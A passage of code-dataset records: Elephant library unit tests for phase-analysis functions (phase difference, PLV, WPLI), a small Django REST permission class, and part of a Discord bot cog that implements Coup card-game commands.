testMeanVector_ranges_of_direction_and_length(self):\n \"\"\"\n Test if the range of the mean vector direction follows numpy standard\n and is within (-pi, pi].\n Test if the range of the mean vector length is within [0, 1].\n \"\"\"\n theta_bar_3, r_3 = elephant.phase_analysis.mean_phase_vector(\n self.dataset3)\n # mean vector direction\n self.assertTrue(-np.pi < theta_bar_3 <= np.pi)\n # mean vector length\n self.assertTrue(0 <= r_3 <= 1)\n\n\nclass PhaseDifferenceTestCase(unittest.TestCase):\n def setUp(self):\n self.tolerance = 1e-15\n self.n_samples = 200\n\n def testPhaseDifference_in_range_minus_pi_to_pi(self):\n \"\"\"\n Test if the range of the phase difference is within [-pi, pi] for\n random pairs of alpha and beta.\n \"\"\"\n alpha = np.random.uniform(-np.pi, np.pi, self.n_samples)\n beta = np.random.uniform(-np.pi, np.pi, self.n_samples)\n\n phase_diff = elephant.phase_analysis.phase_difference(alpha, beta)\n self.assertTrue((-np.pi <= phase_diff).all()\n and (phase_diff <= np.pi).all())\n\n def testPhaseDifference_is_delta(self):\n \"\"\"\n Test if the phase difference is random delta for random pairs of\n alpha and beta, where beta is a copy of alpha shifted by delta.\n \"\"\"\n delta = np.random.uniform(-np.pi, np.pi, self.n_samples)\n alpha = np.random.uniform(-np.pi, np.pi, self.n_samples)\n _beta = alpha - delta\n beta = np.arctan2(np.sin(_beta), np.cos(_beta))\n\n phase_diff = elephant.phase_analysis.phase_difference(alpha, beta)\n np.testing.assert_allclose(phase_diff, delta, atol=1e-10)\n\n\nclass PhaseLockingValueTestCase(unittest.TestCase):\n def setUp(self):\n self.tolerance = 1e-15\n self.phase_shift = np.pi / 4\n self.num_time_points = 1000\n self.num_trials = 100\n\n # create two random uniform distributions (all trials are identical)\n self.signal_x = \\\n np.full([self.num_trials, self.num_time_points],\n np.random.uniform(-np.pi, np.pi, self.num_time_points))\n self.signal_y = \\\n np.full([self.num_trials, self.num_time_points],\n np.random.uniform(-np.pi, np.pi, self.num_time_points))\n\n # create two random uniform distributions, where all trails are random\n self.random_x = np.random.uniform(\n -np.pi, np.pi, (1000, self.num_time_points))\n self.random_y = np.random.uniform(\n -np.pi, np.pi, (1000, self.num_time_points))\n\n # simple samples of different shapes to assert ErrorRaising\n self.simple_x = np.array([[0, -np.pi, np.pi], [0, -np.pi, np.pi]])\n self.simple_y = np.array([0, -np.pi, np.pi])\n self.simple_z = np.array([0, np.pi, np.pi / 2, -np.pi])\n\n def testPhaseLockingValue_identical_signals_both_identical_trials(self):\n \"\"\"\n Test if the PLV's are 1, when 2 identical signals with identical\n trials are passed. PLV's needed to be 1, due to the constant phase\n difference of 0 across trials at each time-point.\n \"\"\"\n list1_plv_t = \\\n elephant.phase_analysis.phase_locking_value(self.signal_x,\n self.signal_x)\n target_plv_r_is_one = np.ones_like(list1_plv_t)\n np.testing.assert_allclose(list1_plv_t, target_plv_r_is_one,\n self.tolerance)\n\n def testPhaseLockingValue_different_signals_both_identical_trials(self):\n \"\"\"\n Test if the PLV's are 1, when 2 different signals are passed, where\n within each signal the trials are identical. PLV's needed to be 1,\n due to a constant phase difference across trials, which may vary for\n different time-points.\n \"\"\"\n list2_plv_t = elephant.phase_analysis.phase_locking_value(\n self.signal_x, self.signal_y)\n target_plv_r_is_one = np.ones_like(list2_plv_t)\n np.testing.assert_allclose(list2_plv_t, target_plv_r_is_one,\n atol=3e-15)\n\n def testPhaseLockingValue_different_signals_both_different_trials(self):\n \"\"\"\n Test if the PLV's are close to 0, when 2 different signals are passed,\n where both have different trials, which are all randomly distributed.\n The PLV's needed to be close to 0, do to a random\n phase difference across trials for each time-point.\n \"\"\"\n list3_plv_t = elephant.phase_analysis.phase_locking_value(\n self.random_x, self.random_y)\n target_plv_is_zero = np.zeros_like(list3_plv_t)\n # use default value from np.allclose() for atol=1e-8 to prevent failure\n np.testing.assert_allclose(list3_plv_t, target_plv_is_zero,\n rtol=1e-2, atol=1.1e-1)\n\n def testPhaseLockingValue_raise_Error_if_trial_number_is_different(self):\n \"\"\"\n Test if a ValueError is raised, when the signals have different\n number of trails.\n \"\"\"\n # different numbers of trails\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.phase_locking_value,\n self.simple_x, self.simple_y)\n\n def testPhaseLockingValue_raise_Error_if_trial_lengths_are_different(self):\n \"\"\"\n Test if a ValueError is raised, when within a trail-pair of the signals\n the trial-lengths are different.\n \"\"\"\n # different lengths in a trail pair\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.phase_locking_value,\n self.simple_y, self.simple_z)\n\n\nclass WeightedPhaseLagIndexTestCase(unittest.TestCase):\n files_to_download_ground_truth = None\n files_to_download_artificial = None\n files_to_download_real = None\n\n @classmethod\n def setUpClass(cls):\n np.random.seed(73)\n\n # The files from G-Node GIN 'elephant-data' repository will be\n # downloaded once into a local temporary directory\n # and then loaded/ read for each test function individually.\n\n # REAL DATA\n real_data_path = \"unittest/phase_analysis/weighted_phase_lag_index/\" \\\n \"data/wpli_real_data\"\n cls.files_to_download_real = (\n (\"i140703-001_ch01_slice_TS_ON_to_GO_ON_correct_trials.mat\",\n \"0e76454c58208cab710e672d04de5168\"),\n (\"i140703-001_ch02_slice_TS_ON_to_GO_ON_correct_trials.mat\",\n \"b06059e5222e91eb640caad0aba15b7f\"),\n (\"i140703-001_cross_spectrum_of_channel_1_and_2_of_slice_\"\n \"TS_ON_to_GO_ON_corect_trials.mat\",\n \"2687ef63a4a456971a5dcc621b02e9a9\")\n )\n for filename, checksum in cls.files_to_download_real:\n # files will be downloaded to ELEPHANT_TMP_DIR\n cls.tmp_path = download_datasets(\n f\"{real_data_path}/{filename}\", checksum=checksum)\n # ARTIFICIAL DATA\n artificial_data_path = \"unittest/phase_analysis/\" \\\n \"weighted_phase_lag_index/data/wpli_specific_artificial_dataset\"\n cls.files_to_download_artificial = (\n (\"artificial_LFPs_1.mat\", \"4b99b15f89c0b9a0eb6fc14e9009436f\"),\n (\"artificial_LFPs_2.mat\", \"7144976b5f871fa62f4a831f530deee4\"),\n )\n for filename, checksum in cls.files_to_download_artificial:\n # files will be downloaded to ELEPHANT_TMP_DIR\n cls.tmp_path = download_datasets(\n f\"{artificial_data_path}/{filename}\", checksum=checksum)\n # GROUND TRUTH DATA\n ground_truth_data_path = \"unittest/phase_analysis/\" \\\n \"weighted_phase_lag_index/data/wpli_ground_truth\"\n cls.files_to_download_ground_truth = (\n (\"ground_truth_WPLI_from_ft_connectivity_wpli_\"\n \"with_real_LFPs_R2G.csv\", \"4d9a7b7afab7d107023956077ab11fef\"),\n (\"ground_truth_WPLI_from_ft_connectivity_wpli_\"\n \"with_artificial_LFPs.csv\", \"92988f475333d7badbe06b3f23abe494\"),\n )\n for filename, checksum in cls.files_to_download_ground_truth:\n # files will be downloaded into ELEPHANT_TMP_DIR\n cls.tmp_path = download_datasets(\n f\"{ground_truth_data_path}/{filename}\", checksum=checksum)\n\n def setUp(self):\n self.tolerance = 1e-15\n\n # load real/artificial LFP-dataset for ground-truth consistency checks\n # real LFP-dataset\n dataset1_real = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/{self.files_to_download_real[0][0]}\",\n squeeze_me=True)\n dataset2_real = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/{self.files_to_download_real[1][0]}\",\n squeeze_me=True)\n\n # get relevant values\n self.lfps1_real = dataset1_real['lfp_matrix'] * pq.uV\n self.sf1_real = dataset1_real['sf'] * pq.Hz\n self.lfps2_real = dataset2_real['lfp_matrix'] * pq.uV\n self.sf2_real = dataset2_real['sf'] * pq.Hz\n # create AnalogSignals from the real dataset\n self.lfps1_real_AnalogSignal = AnalogSignal(\n signal=self.lfps1_real, sampling_rate=self.sf1_real)\n self.lfps2_real_AnalogSignal = AnalogSignal(\n signal=self.lfps2_real, sampling_rate=self.sf2_real)\n\n # artificial LFP-dataset\n dataset1_artificial = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_artificial[0][0]}\", squeeze_me=True)\n dataset2_artificial = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_artificial[1][0]}\", squeeze_me=True)\n # get relevant values\n self.lfps1_artificial = dataset1_artificial['lfp_matrix'] * pq.uV\n self.sf1_artificial = dataset1_artificial['sf'] * pq.Hz\n self.lfps2_artificial = dataset2_artificial['lfp_matrix'] * pq.uV\n self.sf2_artificial = dataset2_artificial['sf'] * pq.Hz\n # create AnalogSignals from the artificial dataset\n self.lfps1_artificial_AnalogSignal = AnalogSignal(\n signal=self.lfps1_artificial, sampling_rate=self.sf1_artificial)\n self.lfps2_artificial_AnalogSignal = AnalogSignal(\n signal=self.lfps2_artificial, sampling_rate=self.sf2_artificial)\n\n # load ground-truth reference calculated by:\n # Matlab package 'FieldTrip': ft_connectivity_wpli()\n self.wpli_ground_truth_ft_connectivity_wpli_real = np.loadtxt(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_ground_truth[0][0]}\",\n delimiter=',', dtype=np.float64)\n self.wpli_ground_truth_ft_connectivity_artificial = np.loadtxt(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_ground_truth[1][0]}\",\n delimiter=',', dtype=np.float64)\n\n def test_WPLI_ground_truth_consistency_real_LFP_dataset(self):\n \"\"\"\n Test if the WPLI is consistent with the reference implementation\n ft_connectivity_wpli() of the MATLAB-package FieldTrip using\n LFP-dataset cuttings from the multielectrode-grasp G-Node GIN\n repository, which can be found here:\n https://doi.gin.g-node.org/10.12751/g-node.f83565/\n The cutting was performed with this python-script:\n multielectrode_grasp_i140703-001_cutting_script_TS_ON_to_GO_ON.py\n which is available on https://gin.g-node.org/INM-6/elephant-data\n in folder validation/phase_analysis/weighted_phase_lag_index/scripts,\n where also the MATLAB-script for ground-truth generation is located.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real, self.lfps2_real, self.sf1_real)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real.magnitude, self.lfps2_real.magnitude,\n self.sf1_real)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real_AnalogSignal, self.lfps2_real_AnalogSignal)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n\n def test_WPLI_ground_truth_consistency_artificial_LFP_dataset(self):\n \"\"\"\n Test if the WPLI is consistent with the ground truth generated with\n multi-sine artificial LFP-datasets.\n The generation was performed with this python-script:\n generate_artificial_datasets_for_ground_truth_of_wpli.py\n which is available on https://gin.g-node.org/INM-6/elephant-data\n in folder validation/phase_analysis/weighted_phase_lag_index/scripts,\n where also the MATLAB-script for ground-truth generation is located.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n\n def test_WPLI_is_zero(self):\n \"\"\"\n Test if WPLI is close to zero at frequency f=70Hz for the multi-sine\n artificial LFP dataset. White noise prevents arbitrary approximation.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n\n def test_WPLI_is_one(self):\n \"\"\"\n Test if WPLI is one at frequency f=16Hz and 36Hz for the multi-sine\n artificial LFP dataset.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n\n def test_WPLI_is_minus_one(self):\n \"\"\"\n Test if WPLI is minus one at frequency f=52Hz and 100Hz\n for the multi-sine artificial LFP dataset.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n mask = ((freq == 52) | (freq == 100))\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n\n def test_WPLI_raises_error_if_signals_have_different_shapes(self):\n \"\"\"\n Test if WPLI raises a ValueError, when the signals have different\n number of trails or different trial lengths.\n \"\"\"\n # simple samples of different shapes to assert ErrorRaising\n trials2_length3 = np.array([[0, -1, 1], [0, -1, 1]]) * pq.uV\n trials1_length3 = np.array([[0, -1, 1]]) * pq.uV\n trials1_length4 = np.array([[0, 1, 1 / 2, -1]]) * pq.uV\n sampling_frequency = 250 * pq.Hz\n trials2_length3_analogsignal = AnalogSignal(\n signal=trials2_length3, sampling_rate=sampling_frequency)\n trials1_length3_analogsignal = AnalogSignal(\n signal=trials1_length3, sampling_rate=sampling_frequency)\n trials1_length4_analogsignal = AnalogSignal(\n signal=trials1_length4, sampling_rate=sampling_frequency)\n\n # different numbers of trails\n with self.subTest(msg=\"diff. trial numbers & Quantity input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials2_length3, trials1_length3, sampling_frequency)\n with self.subTest(msg=\"diff. trial numbers & np.array input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials2_length3.magnitude, trials1_length3.magnitude,\n sampling_frequency)\n with self.subTest(msg=\"diff. trial numbers & neo.AnalogSignal input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials2_length3_analogsignal, trials1_length3_analogsignal)\n # different lengths in a trail pair\n with self.subTest(msg=\"diff. trial lengths & Quantity input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials1_length3, trials1_length4, sampling_frequency)\n with self.subTest(msg=\"diff. trial lengths & np.array input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials1_length3.magnitude, trials1_length4.magnitude,\n sampling_frequency)\n with self.subTest(msg=\"diff. trial lengths & neo.AnalogSignal input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials1_length3_analogsignal, trials1_length4_analogsignal)\n\n @staticmethod\n def test_WPLI_raises_error_if_AnalogSignals_have_diff_sampling_rate():\n \"\"\"\n Test if WPLI raises a ValueError, when the AnalogSignals have different\n sampling rates.\n \"\"\"\n signal_x_250_hz = AnalogSignal(signal=np.random.random([40, 2100]),\n units=pq.mV, sampling_rate=0.25*pq.kHz)\n signal_y_1000_hz = AnalogSignal(signal=np.random.random([40, 2100]),\n units=pq.mV, sampling_rate=1000*pq.Hz)\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x_250_hz, signal_y_1000_hz)\n\n def test_WPLI_raises_error_if_sampling_rate_not_given(self):\n \"\"\"\n Test if WPLI raises a ValueError, when the sampling rate is not given\n for np.array() or Quanitity input.\n \"\"\"\n signal_x = np.random.random([40, 2100]) * pq.mV\n signal_y = np.random.random([40, 2100]) * pq.mV\n with self.subTest(msg=\"Quantity-input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x, signal_y)\n with self.subTest(msg=\"np.array-input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x.magnitude, signal_y.magnitude)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NeuralEnsemble/elephant","sub_path":"elephant/test/test_phase_analysis.py","file_name":"test_phase_analysis.py","file_ext":"py","file_size_in_byte":33242,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"78"} +{"seq_id":"17796321061","text":"from rest_framework import permissions\n\n\nclass IsUserorReadOnly(permissions.BasePermission):\n \"\"\"\n custom permission to only allow creator of organization to mak change in organization information\n \"\"\"\n\n def user_status_ckecker(self, request, view, obj):\n if request.user.is_anonymous:\n return False\n if obj.user == request.user:\n return True\n return False\n","repo_name":"hadi-aa/Final","sub_path":"analyse/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3536378205","text":"'''\nFile: game_cog.py\nAuthor: Gavin Vogt\nThis program creates the Game cog for the Coup Bot\n'''\n\n# dependencies\nfrom discord import User, Embed, Color\nfrom discord.ext import commands\nimport asyncio\n\n# my code\nfrom cogs.base_cog import BaseCog\nfrom classes.coup_game import CoupGame\nfrom classes import actions, responses\nfrom helpers.command_checks import (channel_has_game, game_is_started, is_stage,\n game_not_started, is_player, is_turn,others_in_game, has_enough_coins,\n under_ten_coins, is_game_master, must_swap, must_kill, is_exchange,\n exchange_time_up, not_swapped_yet)\n\n\n# Removing a player during the game\nFORFEIT_HELP = \"Forfeit from a game\"\nKICK_HELP = \"Kick a player from the game\"\n\n# Action commands\nSTEAL_HELP = \"Steal 2 coins from another player (CAPTAIN)\"\nEXCHANGE_HELP = \"Look at two cards in the pile to exchange (AMBASSADOR)\"\nSWAP_HELP = \"Perform the swap in an exchange\"\nNOSWAP_HELP = \"Skipp the swap in an exchange\"\nASSASSINATE_HELP = \"Assassinate another player for 3 coins (ASSASSIN)\"\nTAX_HELP = \"Take tax for +3 coins (DUKE)\"\nINCOME_HELP = \"Take income for +1 coin (GENERAL)\"\nFOREIGNAID_HELP = \"Take foreign aid for +2 coins (GENERAL)\"\nCOUP_HELP = \"Launch a coup on another player for 7 coins (GENERAL)\"\n\n# Response commands\nPASS_HELP = \"Pass on responding to another player's action\"\nCHALLENGE_HELP = \"Challenges a player's claim\"\nDIE_HELP = \"Select card(s) to die\"\nBLOCK_HELP = \"\"\"Blocks another player's action\nValid influence types:\n - contessa\n - captain\n - ambassador\n - duke\n - doublecontessa\n\"\"\"\n\n\nclass GameCog(BaseCog, name=\"game\"):\n '''\n Commands for setting up and playing a game of Coup\n '''\n def __init__(self, bot):\n super().__init__(bot)\n\n async def cog_before_invoke(self, ctx):\n game = self.bot.get_game(ctx.channel.id)\n if game is not None:\n print(\"\\nBefore:\", \"-\"*45, game, sep='\\n')\n print(\"-\"*45)\n\n async def cog_after_invoke(self, ctx):\n '''\n After every command in this Cog, it will automatically check\n if the turn / game is over and advance the turn if necessary.\n '''\n game = self.bot.get_game(ctx.channel.id)\n if game is not None:\n print(\"\\nAfter:\", \"-\"*45, game, sep='\\n')\n\n # Check if game / turn is over\n await self._check_turn_over(ctx.channel, game, advance_if_possible=False)\n await self._check_game_over(ctx.channel, game)\n\n le = game.last_event()\n if le is not None:\n print(\"\\nLast event:\", le)\n print(\"Wins challenge:\", le.wins_challenge())\n print(\"-\"*45)\n\n\n ################################### ACTION COMMANDS ################################\n\n @commands.command(name=\"steal\", help=STEAL_HELP, aliases=['captain'])\n @others_in_game(1, \"steal from\")\n @under_ten_coins()\n @has_enough_coins(actions.Steal.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def steal_from_player(self, ctx, user: User):\n '''\n Steals from another player\n user: discord.User of player to steal from\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.Steal(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @steal_from_player.before_invoke\n async def before_steal_from_player(self, ctx):\n '''\n Before a steal, it checks that the player has at least 1 coin\n and rotates the turn if necessary\n '''\n game = self.bot.get_game(ctx.channel.id)\n user = ctx.message.mentions[0]\n stealing_from = game.get_player(user.id)\n if stealing_from.get_coins() < 1:\n # user doesn't have enough coins to steal from\n await ctx.send(f\"{user.mention} is too broke to steal from\")\n raise commands.CheckFailure(f\"{user.mention} is too broke to steal from\")\n await self.pre_action_check(ctx)\n\n @commands.command(name=\"exchange\", help=EXCHANGE_HELP, aliases=['ambassador'])\n @under_ten_coins()\n @has_enough_coins(actions.Exchange.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def exchange_cards(self, ctx):\n '''\n Lets the user view the top two cards in the pile and\n swap up to one of their own cards with one from the pile\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n exchange = actions.Exchange(player)\n game.action = exchange\n exchange.perform_action()\n await ctx.send(exchange.attempt_message())\n\n # Wait for someone to challenge before continuing\n wait_time = actions.Exchange.get_wait_time()\n wait_embed = Embed(\n title = \"Waiting for challenges ...\",\n description = f\"{wait_time} seconds remaining\",\n color = Color.orange(),\n )\n msg = await ctx.send(embed=wait_embed)\n exchange.set_time_up(False)\n await asyncio.sleep(1)\n for i in range(wait_time - 1, 0, -1):\n if game.challenge1 is not None:\n # challenge occurred; continue and see if won\n exchange.set_time_up(True)\n break\n wait_embed.description = f\"{i} seconds remaining\"\n await msg.edit(embed=wait_embed)\n await asyncio.sleep(1)\n\n # Wait is over\n exchange.set_time_up(True)\n if game.challenge1 is not None and not exchange.wins_challenge():\n # Exchange failed\n wait_embed.description = \"CANCELLED\"\n wait_embed.color = Color.red()\n await msg.edit(embed=wait_embed)\n await ctx.send(\"Exchange cancelled\")\n else:\n # Carry out the exchange\n wait_embed.description = \"SUCCESS\"\n wait_embed.color = Color.green()\n await msg.edit(embed=wait_embed)\n await ctx.send(f\"Showing {exchange.done_by.get_mention()} top 2 cards\")\n\n # Draw the top two cards\n exchange.set_card(0, game.draw_card())\n exchange.set_card(1, game.draw_card())\n card_embed = Embed(\n title = \"Top Two Cards\",\n description = \"Use `c!hand` if you need to see your hand.\\nSelect a card to swap with:\",\n color = Color.green(),\n )\n card_embed.set_footer(text=\"c!swap \\nc!noswap\")\n card_embed.add_field(name=\"Card 1\", value=exchange.get_card(0).capitalize())\n card_embed.add_field(name=\"Card 2\", value=exchange.get_card(1).capitalize())\n\n await exchange.done_by.get_user().send(embed=card_embed)\n\n @commands.command(name=\"swap\", help=SWAP_HELP)\n @exchange_time_up(True)\n @not_swapped_yet()\n @is_exchange()\n @must_swap()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def perform_card_swap(self, ctx, your_card: int, swap_with: int):\n '''\n Lets the user perform a card swap to finish the Exchange\n your_card: index of player's card to swap\n swap_with: index of exchange card to swap with\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Verify that the indices are valid\n your_card -= 1\n swap_with -= 1\n if not (0 <= your_card < game.influences_per_player()):\n await ctx.send(f\"Invalid index: `your_card={your_card + 1}`\")\n return\n if not player[your_card].alive:\n await ctx.send(f\"Your card `{your_card + 1}` is not alive\")\n return\n if not (0 <= swap_with <= 1):\n await ctx.send(f\"Invalid index: `swap_with={swap_with + 1}`\")\n return\n\n # Perform the swap\n await player.get_user().send(f\"Swapped your `{player[your_card].type.capitalize()}`, for `{game.action.get_card(swap_with).capitalize()}`\")\n game.action.perform_swap(your_card, swap_with, game)\n player.must_swap = False\n await ctx.send(\"Performed swap and shuffled draw pile\")\n\n await self._check_turn_over(ctx.channel, game, advance_if_possible=True)\n\n @commands.command(name=\"noswap\", help=NOSWAP_HELP)\n @exchange_time_up(True)\n @not_swapped_yet()\n @is_exchange()\n @must_swap()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def no_card_swap(self, ctx):\n '''\n Lets the user decide not to swap cards\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n game.action.perform_swap(None, 0, game)\n player.must_swap = False\n await ctx.send(\"Skipped swap and shuffled draw pile\")\n\n await self._check_turn_over(ctx.channel, game, advance_if_possible=True)\n\n @commands.command(name=\"assassinate\", help=ASSASSINATE_HELP, aliases=['assassin'])\n @others_in_game(1, \"assassinate\")\n @under_ten_coins()\n @has_enough_coins(actions.Assassinate.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def assassinate_player(self, ctx, user: User):\n '''\n Assassinates another player\n user: discord.User of player to assassinate\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.Assassinate(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @commands.command(name=\"tax\", help=TAX_HELP, aliases=['duke'])\n @under_ten_coins()\n @has_enough_coins(actions.Tax.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_tax(self, ctx):\n '''\n Lets a duke take tax\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.Tax(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n\n @commands.command(name=\"income\", help=INCOME_HELP)\n @under_ten_coins()\n @has_enough_coins(actions.Income.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_income(self, ctx):\n '''\n Lets a player take income\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.Income(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n\n @commands.command(name=\"foreignaid\", help=FOREIGNAID_HELP)\n @under_ten_coins()\n @has_enough_coins(actions.ForeignAid.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_foreign_aid(self, ctx):\n '''\n Lets a player take foreign aid\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.ForeignAid(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await 